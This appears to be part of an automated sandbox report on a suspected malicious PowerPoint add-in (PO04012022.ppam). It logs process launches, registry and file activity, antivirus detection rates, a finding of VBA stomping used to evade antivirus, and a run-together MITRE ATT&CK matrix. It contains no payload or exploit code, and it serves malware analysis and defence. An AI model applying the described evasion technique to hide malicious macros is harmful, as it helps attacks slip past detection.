Source: ~DFC4F56B0AF15685FD.TMP.8.drOLE indicator, VBA macros: true
Source: ~DFC4F56B0AF15685FD.TMP.8.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: PO04012022.ppamVirustotal: Detection: 12%
Source: PO04012022.ppamReversingLabs: Detection: 27%
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE "C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" /AUTOMATION -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\PO04012022.ppam"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\PO04012022.ppam" /ou "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\PO04012022.ppam" /ou "Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEFile created: C:\Users\user~1\AppData\Local\Temp\{70D4C3B7-E911-4ABC-A60E-695677A2A539} - OProcSessId.datJump to behavior
Source: classification engineClassification label: mal64.expl.evad.winPPAM@6/6@0/0
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed

HIPS / PFW / Operating System Protection Evasion:

barindex
Document contains VBA stomped code (only p-code) potentially bypassing AV detectionShow sources
Source: ~DFC4F56B0AF15685FD.TMP.8.drOLE indicator, VBA stomping: true
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\PO04012022.ppam" /ou "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting22DLL Side-Loading1Process Injection11Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Process Injection11LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Extra Window Memory Injection1Scripting22Security Account ManagerSystem Information Discovery12SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.